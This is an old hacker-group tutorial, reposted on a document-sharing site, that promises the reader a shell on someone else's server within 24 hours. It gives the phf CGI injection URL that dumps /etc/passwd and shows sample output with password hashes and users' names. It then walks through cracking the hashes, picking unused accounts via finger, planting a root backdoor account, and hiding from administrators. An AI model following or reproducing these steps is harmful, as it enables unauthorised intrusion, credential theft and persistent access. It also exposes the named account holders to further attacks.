how to get a shell in 24 hours

Upload: jagmohan-jaggu

Post on 07-Apr-2018

225 views

Category:

Documents


0 download

TRANSCRIPT

  • 8/6/2019 How to Get a Shell in 24 Hours

    1/3

    _________ ___ _______\~=._ _.=~/ / _____/ \ \ \~=._ _.=~/\ ~=__=~ / \_____ \ / \ \ ~=__=~ /\_.=~ ~=._/ / \ / \ \_.=~ ~=._/

    _.=~ \ / ~=._ /_______ / ___\______ / .=~ \ / ~=.

    L------\------/------7 \/ \/ L------\------/------7\ / \ /\ / http://www.sinnerz.com \ /\/ \/

    ******************************************************************** Have a shell in 24hours after reading this, or your money back. ********************************************************************A Darkfool Text- member of SIN http://www.sinnerz.com

    Infected http://www.infected.orgI have read many a hacking e-zines, and 'how to hack' documents before. Theyare ok, interesting etc. but they always show you how to get root through a

    shell, what people seem to forget is the fact that you have to actually getthe password before you can use a shell to an account. You might be luckyand find that l:guest p:guest will work. In this text I will show you howeasy hacking is ( on old deformed systems ) and how you can get a shell ofsome sort in 24 hours after reading this. I am not going to go on to explainhow to get root after getting a shell as there are 1000's of texts and Cprograms which explain this.OK, the very first thing you need to do is to have a WWW browser, a telnetprogram, john the ripper kracker program ( i recommend ) and a gooddictionary file.WWW Browser - Netrape or MSIE are fineTelnet Program - One which lets you set which port you want to connect toJohn The Ripper - Will be at http://www.sinnerz.com/darkfool

    Dictionary File - Found at many hacking web sites. Do a search for oneOk, every net user/wanna be hacker will have most of those programs and ifya don't there really easy to get a hold of.OK, now I am going to tell you something about Japan. They make your stero,they made the bits inside your computer, they made your car, they madeeverything electronic around you, you have their eyes at the end of yournob, but they are rubbish at one thing, the internet and security. Thehonestly don't know anything about internet security, I have rooted or gotshells on many a japanese servers. These are my favourite systems to attackbecause they are soooooo easy. I am also told that Australian servers arevery easy too, some Berkeley UNiversity machines are very easy to krack too.Next thing you got to do is fire up your WWW browser. Goto AltaVista

    http://www.alta-vista.digital.com if you don't know already this is a searchengine which has some very nice advance features.Once here in the search field box type this url:ac.jp and press search,this looks for all URL's with ac.jp in. This is academic places in Japan,similar to the US which has .edu instead. You will be presented with a loadof web pages which text you probably can't read because its all in somefunny language. More importantly is the URL which they point out, forexample, www.mo.cs.rekimoko.ac.jp , notice the ac.jp at the end of it.Click on the link to the site ( longer server urls are easier to break intoBTW ). When the URL appears on the WWW browser box at the top of the screenadd this line to the end of it./cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwdor

    /cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwdi.ehttp://www.mo.cs.rekimoko.ac.jp/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

  • 8/6/2019 How to Get a Shell in 24 Hours

    2/3

    To all you 313375 out there, yes, i know this is the phf technique and it isvirtually dead, but you'll be surpised where you can use this.This technique of finding the password file to the system is old, it wasfirst used in November 1996 on the FBI web page by a few hackers. It hasbeen patched up by a lot of servers, so this won't work on www.nasa.gov ormost of www.*.com but still works on many University servers outside of EUand US.

    Ok, once the URL has been entered you will see a number or things :-Error 404/cgi-bin/phf is not found on this serverORWARNINGYou do not have permission to view /cgi-bin/phf/ on this serverThere are a number of other things the server might say, but the thing youwant it to say is the following :-/cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwdroot:2fkbNba29uWys:0:1:Operator:/:/bin/cshwww-admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/cshkangaroo:3A62i9qr.YmO.:1012:10:Hisaharu

    TANAKA:/home/user/kangaroo:/usr/local/bin/tcshmaemae:dvUMqNmeeENFs:1016:10:Akiko Maeda:/home/user/maemae:/bin/cshwatanaby:ewF90K0gwXVD6:1006:10:Yoshiaki WATANABE:/home/user/watanaby:/bin/cshkake:kFph8HEM/aaAA:1007:10:Tetsuro KAKESHITA:/home/user/kake:/bin/cshetc.......This means you have hit the jackpot !If you get something similar to this but all lines have something similar tothe following :-root:*:0:1:Operator:/:/bin/cshwww-admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/cshkangaroo:*:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcshmaemae:*:1016:10:Akiko Maeda:/home/user/maemae:/bin/cshwatanaby:*:1006:10:Yoshiaki WATANABE:/home/user/watanaby:/bin/csh

    kake:*:1007:10:Tetsuro KAKESHITA:/home/user/kake:/bin/csh( notice the * ) if you don't know already this means its shadowed and youcannot work out the password using a shadowed file.If some but not all of the logins have * in them its ok, its worthwhilegetting the ones which aren't shadowed, hey, a shell is a shell !Get all the lines which aren't shadowed and then paste them into notepad,write the name of the server in the top line of the file and save it.Ok now for the next bit, this is fairly simple but can be a lengthy processdepending upon which speed machine you have and how big your password fileis and dictionary file. Use john the ripper or whatever password cracker youare using, although i recommend john the ripper because its quick. This willprobably take a long time so go to the pub or have a drive or something.......If you are lucky enough to work out the passwords to the logins then welldone, if you don't, them find another server or increase the size of yourdictionary file, make it as big as you can, the bigger the better, the moreluck you will have in finding the password.OK, you got some passwords to a few logins, if you got root them jump aroundthe room with joy ( I do ). If you didn't then, well, atleast you gotyourself some shells. Now, if you want to keep these shells without anyoneknowing then your best bet is to telnet to the site at port 79, you willhave a blank prompt, here type in the username of the account you cracked,it will tell you the last time they logged in, do this for all the accounts,use the account which isn't used very much, the best ones are the ones whichsay ' User Never Logged On ' because then the account is basically yours !{ Note: If you get root type the following at the shell prompt :-

    echo "myserver::0:0:Test User:/:/bin/csh" >> \etc\passwdThis wil allow you to login to the server with l:myserver so you don't getadmin suspicous when they see people login in as root. }

  • 8/6/2019 How to Get a Shell in 24 Hours

    3/3

    Hide yourself as much as possible, if you already have a shell then gothrough that first when logging on, or, telnet to the hacked shell and thenre-telnet to the hacked shell using the hacked shell, if you see what Imean, so your who appears as localhost. Get some C scripts which delete yourpresence etc...Thats it, if there's demand to explain this in further detail then pleasee-mail me telling me you want a follow up, I don't do personal help so don't

    e-mail me asking for help PLEASE DON'T !Thats it....." Stay cool and be somebodys darkfool this year "Saying a quick hello to #prophet undernet. Visit me on #sin.I am at http://www.sinnerz.com/darkfool

    [email protected] also a lot of japanese servers ;)--" Stay Cool and be somebody's Darkfool "

    http://sinnerz.com/darkfool=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-